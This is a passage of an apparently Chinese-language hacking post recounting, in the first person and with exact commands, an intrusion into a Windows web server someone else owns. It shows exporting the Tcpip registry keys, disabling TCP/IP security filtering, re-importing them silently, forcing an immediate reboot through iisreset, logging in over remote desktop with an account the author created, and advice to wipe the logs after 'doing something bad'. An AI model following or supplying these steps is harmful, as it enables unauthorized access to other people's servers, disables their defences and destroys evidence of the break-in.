又成功,然后执行了一下netstat-an看了一下,ok,3389已经开放了,不用在麻烦我去开3389了,ok,找3389终端登陆,go。
打开终端了,但是连不上,晕忽忽。哭哟,用户名都建好了,还连不上主机,在翻了一下目录,也没看到有防火墙,使用ipconfig-all,也没有和内网连接的迹象呀,郁闷ing,不知道怎么办了。正好在冰点极限论坛看到了一篇文章,“从上传webshell到突破TCP/IP筛选到3389终端登陆”(我在下面的回帖中会放上这个帖子,帖子中有详细的介绍)其实这样的文章好多,平时其实没怎么注意的,正好现在被我看到了,哈哈运气好,希望明天买彩票也能中个500W就好了。ok。其实是服务器做了TCP,IP筛选,3389端口可能只能让某一段IP进行访问,那好吧,我们就把他删掉。
D:\ftp.exe\"regedit-eD:\.1regHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\" 导出注册表里关于TCP/IP筛选的第一处
D:\ftp.exe\"regedit-eD:\2.regHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\" 导出注册表里关于TCP/IP筛选的第i二处
D:\ftp.exe\"regedit-eD:\3.regHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\" 导出注册表里关于TCP/IP筛选的第三处
然后下载到自己的PC里,使用记事本编辑,然后ctrl+F搜索EnableSecurityFilters\"=dword:00000001这个参数,把它改成EnableSecurityFilters\"=dword:00000000。 把1.reg,2.reg,3.reg都改过来,然后上传回服务器路径中,我又上传到了D盘里,~好了,我们要把刚才编辑的1,2,3都导入注册表中。
D:\ftp.exe\"regedit-sD:\1.reg\" 直接将1.reg导入到注册表中
另外两个也一样。
然后在执行
D:\ftp.exe\"iisreset/reboot/timeout:00\" 利用他自身的iis服务来重新启动他的机器,/timeout:00这个参数是让他立即重新启动,也就是一小会,访问网站,已经访问不进去了,差不多几分钟后,可以访问了,直接登陆3389,输入我建立的用户名,ok了。我们的提权访问工作也做完了。最好也把日志清一下,做坏事了嘛,嘿嘿。下面是日志存放文件,在DOS下运行一下就ok了,不在需要用用别的工具咯。